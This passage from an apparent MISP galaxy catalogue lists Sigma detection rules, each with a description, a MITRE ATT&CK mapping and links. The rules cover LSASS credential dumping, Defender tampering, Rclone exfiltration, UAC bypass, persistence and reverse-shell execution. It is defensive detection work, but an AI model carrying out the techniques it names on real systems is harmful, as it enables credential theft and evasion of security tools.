  • related-to: misp-galaxy:mitre-attack-pattern="Windows Credential Manager - T1555.004" with estimative-language:likelihood-probability="almost-certain"

Table 10412. Table References

Links

https://twitter.com/NinjaParanoid/status/1516442028963659777

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_keymgr.yml

Stop Windows Service Via PowerShell Stop-Service

Detects the stopping of a Windows service via the PowerShell Cmdlet "Stop-Service"

The tag is: misp-galaxy:sigma-rules="Stop Windows Service Via PowerShell Stop-Service"

Stop Windows Service Via PowerShell Stop-Service has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Stop - T1489" with estimative-language:likelihood-probability="almost-certain"

Table 10413. Table References

Links

https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/stop-service?view=powershell-7.4

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_stop_service.yml

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution

Detects potentially suspicious child processes launched via the ScreenConnect client service.

The tag is: misp-galaxy:sigma-rules="Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution"

Remote Access Tool - ScreenConnect Potential Suspicious Remote Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Remote Access Software - T1219" with estimative-language:likelihood-probability="almost-certain"

Table 10414. Table References

Links

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

https://docs.connectwise.com/ConnectWise_Control_Documentation/Get_started/Host_client/View_menu/Backstage_mode

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_screenconnect_remote_execution_susp.yml

Potential PowerShell Execution Via DLL

Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll

The tag is: misp-galaxy:sigma-rules="Potential PowerShell Execution Via DLL"

Potential PowerShell Execution Via DLL has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

Table 10415. Table References

Links

https://github.com/p3nt4/PowerShdll/blob/62cfa172fb4e1f7f4ac00ca942685baeb88ff356/README.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_dll_execution.yml

Suspicious Recursive Takeown

Adversaries can manipulate DACLs with the built-in Windows command takeown, which can grant them higher permissions on specific files and folders

The tag is: misp-galaxy:sigma-rules="Suspicious Recursive Takeown"

Suspicious Recursive Takeown has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows File and Directory Permissions Modification - T1222.001" with estimative-language:likelihood-probability="almost-certain"

Table 10416. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/takeown

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_takeown_recursive_own.yml

Windows Defender Definition Files Removed

Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files

The tag is: misp-galaxy:sigma-rules="Windows Defender Definition Files Removed"

Windows Defender Definition Files Removed has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10417. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml

Execution via WorkFolders.exe

Detects using WorkFolders.exe to execute an arbitrary control.exe

The tag is: misp-galaxy:sigma-rules="Execution via WorkFolders.exe"

Execution via WorkFolders.exe has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10418. Table References

Links

https://twitter.com/elliotkillick/status/1449812843772227588

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_workfolders.yml

Suspicious Command Patterns In Scheduled Task Creation

Detects scheduled task creation using "schtasks" that contain potentially suspicious or uncommon commands

The tag is: misp-galaxy:sigma-rules="Suspicious Command Patterns In Scheduled Task Creation"

Suspicious Command Patterns In Scheduled Task Creation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 10419. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/devil-bait/NCSC-MAR-Devil-Bait.pdf

https://twitter.com/RedDrip7/status/1506480588827467785

https://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_susp_pattern.yml

Tamper Windows Defender Remove-MpPreference

Detects attempts to remove Windows Defender configurations using the 'MpPreference' cmdlet

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender Remove-MpPreference"

Tamper Windows Defender Remove-MpPreference has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 10420. Table References

Links

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remove_mppreference.yml

Potential Credential Dumping Via WER

Detects potential credential dumping via the Windows Error Reporting LSASS Shtinkering technique, which uses Windows Error Reporting to dump lsass

The tag is: misp-galaxy:sigma-rules="Potential Credential Dumping Via WER"

Potential Credential Dumping Via WER has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10421. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_werfault_lsass_shtinkering.yml

PUA- IOX Tunneling Tool Execution

Detects the use of IOX - a tool for port forwarding and intranet proxy purposes

The tag is: misp-galaxy:sigma-rules="PUA- IOX Tunneling Tool Execution"

PUA- IOX Tunneling Tool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

Table 10422. Table References

Links

https://github.com/EddieIvan01/iox

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_iox.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION

Detects obfuscated PowerShell via the VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 10423. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml

Suspicious CustomShellHost Execution

Detects the execution of the CustomShellHost binary where the child process is not 'C:\Windows\explorer.exe'

The tag is: misp-galaxy:sigma-rules="Suspicious CustomShellHost Execution"

Suspicious CustomShellHost Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10424. Table References

Links

https://github.com/LOLBAS-Project/LOLBAS/pull/180

https://lolbas-project.github.io/lolbas/Binaries/CustomShellHost/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml

Dllhost.EXE Execution Anomaly

Detects a "dllhost" process spawning with no command-line arguments, which is very rare and could indicate process injection activity or malware mimicking similar system processes.

The tag is: misp-galaxy:sigma-rules="Dllhost.EXE Execution Anomaly"

Dllhost.EXE Execution Anomaly has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

Table 10425. Table References

Links

https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf

https://redcanary.com/blog/child-processes/

https://nasbench.medium.com/what-is-the-dllhost-exe-process-actually-running-ef9fe4c19c08

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dllhost_no_cli_execution.yml

Elevated System Shell Spawned From Uncommon Parent Location

Detects when a shell program such as the Windows command prompt or PowerShell is launched with system privileges from an uncommon parent location.

The tag is: misp-galaxy:sigma-rules="Elevated System Shell Spawned From Uncommon Parent Location"

Elevated System Shell Spawned From Uncommon Parent Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10426. Table References

Links

https://github.com/Wh04m1001/SysmonEoP

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_elevated_system_shell_uncommon_parent.yml

Renamed CreateDump Utility Execution

Detects use of a renamed legitimate createdump.exe LOLBIN utility to dump process memory

The tag is: misp-galaxy:sigma-rules="Renamed CreateDump Utility Execution"

Renamed CreateDump Utility Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10427. Table References

Links

https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/

https://twitter.com/bopin2020/status/1366400799199272960

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_createdump.yml

Assembly Loading Via CL_LoadAssembly.ps1

Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass AppLocker controls.

The tag is: misp-galaxy:sigma-rules="Assembly Loading Via CL_LoadAssembly.ps1"

Assembly Loading Via CL_LoadAssembly.ps1 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Script Proxy Execution - T1216" with estimative-language:likelihood-probability="almost-certain"

Table 10428. Table References

Links

https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/

https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cl_loadassembly.yml

Cloudflared Tunnel Connections Cleanup

Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to clean up tunnel connections.

The tag is: misp-galaxy:sigma-rules="Cloudflared Tunnel Connections Cleanup"

Cloudflared Tunnel Connections Cleanup has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Proxy - T1090" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Protocol Tunneling - T1572" with estimative-language:likelihood-probability="almost-certain"

Table 10429. Table References

Links

https://github.com/cloudflare/cloudflared

https://developers.cloudflare.com/cloudflare-one/connections/connect-apps

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml

Windows Admin Share Mount Via Net.EXE

Detects when an admin share is mounted using net.exe

The tag is: misp-galaxy:sigma-rules="Windows Admin Share Mount Via Net.EXE"

Windows Admin Share Mount Via Net.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="SMB/Windows Admin Shares - T1021.002" with estimative-language:likelihood-probability="almost-certain"

Table 10430. Table References

Links

https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml

WebDav Client Execution Via Rundll32.EXE

Detects "svchost.exe" spawning "rundll32.exe" with command arguments like "C:\windows\system32\davclnt.dll,DavSetCookie". This could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).

The tag is: misp-galaxy:sigma-rules="WebDav Client Execution Via Rundll32.EXE"

WebDav Client Execution Via Rundll32.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration Over Unencrypted Non-C2 Protocol - T1048.003" with estimative-language:likelihood-probability="almost-certain"

Table 10431. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md

https://github.com/OTRF/detection-hackathon-apt29/issues/17

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml

Disable Windows IIS HTTP Logging

Detects disabling of HTTP logging on a Windows IIS web server, as seen used by Threat Group 3390 (Bronze Union)

The tag is: misp-galaxy:sigma-rules="Disable Windows IIS HTTP Logging"

Disable Windows IIS HTTP Logging has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 10432. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_http_logging.yml

Renamed MegaSync Execution

Detects the execution of a renamed MegaSync.exe as seen used by ransomware families like Nefilim, Sodinokibi, Pysa, and Conti.

The tag is: misp-galaxy:sigma-rules="Renamed MegaSync Execution"

Renamed MegaSync Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10433. Table References

Links

https://redcanary.com/blog/rclone-mega-extortion/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_megasync.yml

Potential Persistence Attempt Via Run Keys Using Reg.EXE

Detects a suspicious reg.exe command line adding a key to the Run key in the registry

The tag is: misp-galaxy:sigma-rules="Potential Persistence Attempt Via Run Keys Using Reg.EXE"

Potential Persistence Attempt Via Run Keys Using Reg.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 10434. Table References

Links

https://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/

https://docs.microsoft.com/en-us/windows/win32/setupapi/run-and-runonce-registry-keys

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_add_run_key.yml

HackTool - Empire PowerShell UAC Bypass

Detects some Empire PowerShell UAC bypass methods

The tag is: misp-galaxy:sigma-rules="HackTool - Empire PowerShell UAC Bypass"

HackTool - Empire PowerShell UAC Bypass has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 10435. Table References

Links

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64

https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml

Potential Shim Database Persistence via Sdbinst.EXE

Detects installation of a new shim using sdbinst.exe. Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims

The tag is: misp-galaxy:sigma-rules="Potential Shim Database Persistence via Sdbinst.EXE"

Potential Shim Database Persistence via Sdbinst.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 10436. Table References

Links

https://www.mandiant.com/resources/blog/fin7-shim-databases-persistence

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdbinst_shim_persistence.yml

Data Copied To Clipboard Via Clip.EXE

Detects the execution of clip.exe in order to copy data to the clipboard. Adversaries may collect data stored in the clipboard from users copying information within or between applications.

The tag is: misp-galaxy:sigma-rules="Data Copied To Clipboard Via Clip.EXE"

Data Copied To Clipboard Via Clip.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 10437. Table References

Links

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/clip

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_clip_execution.yml

Php Inline Command Execution

Detects execution of php using the "-r" flag. This could be used as a way to launch a reverse shell or execute live PHP code.

The tag is: misp-galaxy:sigma-rules="Php Inline Command Execution"

Php Inline Command Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

Table 10438. Table References

Links

https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

https://www.php.net/manual/en/features.commandline.php

https://www.revshells.com/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_php_inline_command_execution.yml

Suspicious Workstation Locking via Rundll32

Detects a suspicious call to the user32.dll function that locks the user workstation

The tag is: misp-galaxy:sigma-rules="Suspicious Workstation Locking via Rundll32"

Table 10439. Table References

Links

https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_user32_dll.yml

Arbitrary File Download Via Squirrel.EXE

Detects the usage of the "Squirrel.exe" to download arbitrary files. This binary is part of multiple Electron based software installations (Slack, Teams, Discord, etc.)

The tag is: misp-galaxy:sigma-rules="Arbitrary File Download Via Squirrel.EXE"

Arbitrary File Download Via Squirrel.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10440. Table References

Links

https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/

http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/

http://www.hexacorn.com/blog/2019/03/30/sqirrel-packages-manager-as-a-lolbin-a-k-a-many-electron-apps-are-lolbins-by-default/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_squirrel_download.yml

PUA - RunXCmd Execution

Detects the use of the RunXCmd tool to execute commands with System or TrustedInstaller accounts

The tag is: misp-galaxy:sigma-rules="PUA - RunXCmd Execution"

PUA - RunXCmd Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10441. Table References

Links

https://www.d7xtech.com/free-software/runx/

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_runxcmd.yml

DumpMinitool Execution

Detects the use of "DumpMinitool.exe", a tool that allows dumping process memory via the "MiniDumpWriteDump" API

The tag is: misp-galaxy:sigma-rules="DumpMinitool Execution"

DumpMinitool Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10442. Table References

Links

https://twitter.com/mrd0x/status/1511489821247684615

https://gist.github.com/nasbench/6d58c3c125e2fa1b8f7a09754c1b087f

https://lolbas-project.github.io/lolbas/OtherMSBinaries/DumpMinitool/

https://twitter.com/mrd0x/status/1511415432888131586

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dumpminitool_execution.yml

Potential Rundll32 Execution With DLL Stored In ADS

Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).

The tag is: misp-galaxy:sigma-rules="Potential Rundll32 Execution With DLL Stored In ADS"

Potential Rundll32 Execution With DLL Stored In ADS has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTFS File Attributes - T1564.004" with estimative-language:likelihood-probability="almost-certain"

Table 10443. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Rundll32

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml

PUA - Rclone Execution

Detects execution of the RClone utility for exfiltration as used by various ransomware strains like REvil, Conti, FiveHands, etc.

The tag is: misp-galaxy:sigma-rules="PUA - Rclone Execution"

PUA - Rclone Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Exfiltration to Cloud Storage - T1567.002" with estimative-language:likelihood-probability="almost-certain"

Table 10444. Table References

Links

https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/

https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a

https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware

https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_rclone_execution.yml

Local File Read Using Curl.EXE

Detects execution of "curl.exe" with the "file://" protocol handler in order to read local files.

The tag is: misp-galaxy:sigma-rules="Local File Read Using Curl.EXE"

Table 10445. Table References

Links

https://curl.se/docs/manpage.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_curl_local_file_read.yml

Deleted Data Overwritten Via Cipher.EXE

Detects usage of the "cipher" built-in utility in order to overwrite deleted data on disk. Adversaries may destroy data and files on specific systems or in large numbers on a network to interrupt availability to systems, services, and network resources. Data destruction is likely to render stored data irrecoverable by forensic techniques through overwriting files or data on local and remote drives.

The tag is: misp-galaxy:sigma-rules="Deleted Data Overwritten Via Cipher.EXE"

Deleted Data Overwritten Via Cipher.EXE has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"

Table 10446. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cipher_overwrite_deleted_data.yml

PUA - Nmap/Zenmap Execution

Detects usage of nmap/zenmap. Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation

The tag is: misp-galaxy:sigma-rules="PUA - Nmap/Zenmap Execution"

PUA - Nmap/Zenmap Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Network Service Discovery - T1046" with estimative-language:likelihood-probability="almost-certain"

Table 10447. Table References

Links

https://nmap.org/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md#atomic-test-3---port-scan-nmap-for-windows

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nmap_zenmap.yml

Unsigned AppX Installation Attempt Using Add-AppxPackage

Detects usage of the "Add-AppxPackage" cmdlet or its alias "Add-AppPackage" to install unsigned AppX packages

The tag is: misp-galaxy:sigma-rules="Unsigned AppX Installation Attempt Using Add-AppxPackage"

Table 10448. Table References

Links

https://learn.microsoft.com/en-us/windows/msix/package/unsigned-package

https://twitter.com/WindowsDocs/status/1620078135080325122

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml

Esentutl Gather Credentials

Conti recommended to its affiliates that they use esentutl to access a dumped NTDS file. Trickbot also uses this utility to get MSEdge information via its pwgrab module.

The tag is: misp-galaxy:sigma-rules="Esentutl Gather Credentials"

Esentutl Gather Credentials has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 10449. Table References

Links

https://attack.mitre.org/software/S0404/

https://twitter.com/vxunderground/status/1423336151860002816

https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_esentutl_params.yml

Suspicious Execution of Hostname

Detects use of the hostname command to gather system information

The tag is: misp-galaxy:sigma-rules="Suspicious Execution of Hostname"

Suspicious Execution of Hostname has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

Table 10450. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows

https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/hostname

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hostname_execution.yml

Process Access via TrolleyExpress Exclusion

Detects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory

The tag is: misp-galaxy:sigma-rules="Process Access via TrolleyExpress Exclusion"

Process Access via TrolleyExpress Exclusion has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Rundll32 - T1218.011" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 10451. Table References

Links

https://www.youtube.com/watch?v=Ie831jF0bb0

https://twitter.com/xpn/status/1491557187168178176

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_citrix_trolleyexpress_procdump.yml

PUA - NSudo Execution

Detects the use of NSudo tool for command execution

The tag is: misp-galaxy:sigma-rules="PUA - NSudo Execution"

PUA - NSudo Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"

Table 10452. Table References

Links

https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/

https://nsudo.m2team.org/en-us/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_nsudo.yml

Suspicious GrpConv Execution

Detects suspicious execution of GrpConv, a utility that converts Windows 3.x .grp files, which can also be used for persistence purposes by malicious software or actors

The tag is: misp-galaxy:sigma-rules="Suspicious GrpConv Execution"

Suspicious GrpConv Execution has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Boot or Logon Autostart Execution - T1547" with estimative-language:likelihood-probability="almost-certain"

Table 10453. Table References

Links

https://twitter.com/0gtweet/status/1526833181831200770

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_grpconv.yml

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses

Detects calls to the AtomicTestHarnesses "Invoke-ATHRemoteFXvGPUDisablementCommand" which is designed to abuse the "RemoteFXvGPUDisablement.exe" binary to run custom PowerShell code via module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses"

RemoteFXvGPUDisablement Abuse Via AtomicTestHarnesses has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 10454. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml

WMI Backdoor Exchange Transport Agent

Detects a WMI backdoor in Exchange Transport Agents via WMI event filters

The tag is: misp-galaxy:sigma-rules="WMI Backdoor Exchange Transport Agent"

WMI Backdoor Exchange Transport Agent has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation Event Subscription - T1546.003" with estimative-language:likelihood-probability="almost-certain"

Table 10455. Table References

Links

https://twitter.com/cglyer/status/1182391019633029120

https://twitter.com/cglyer/status/1182389676876980224

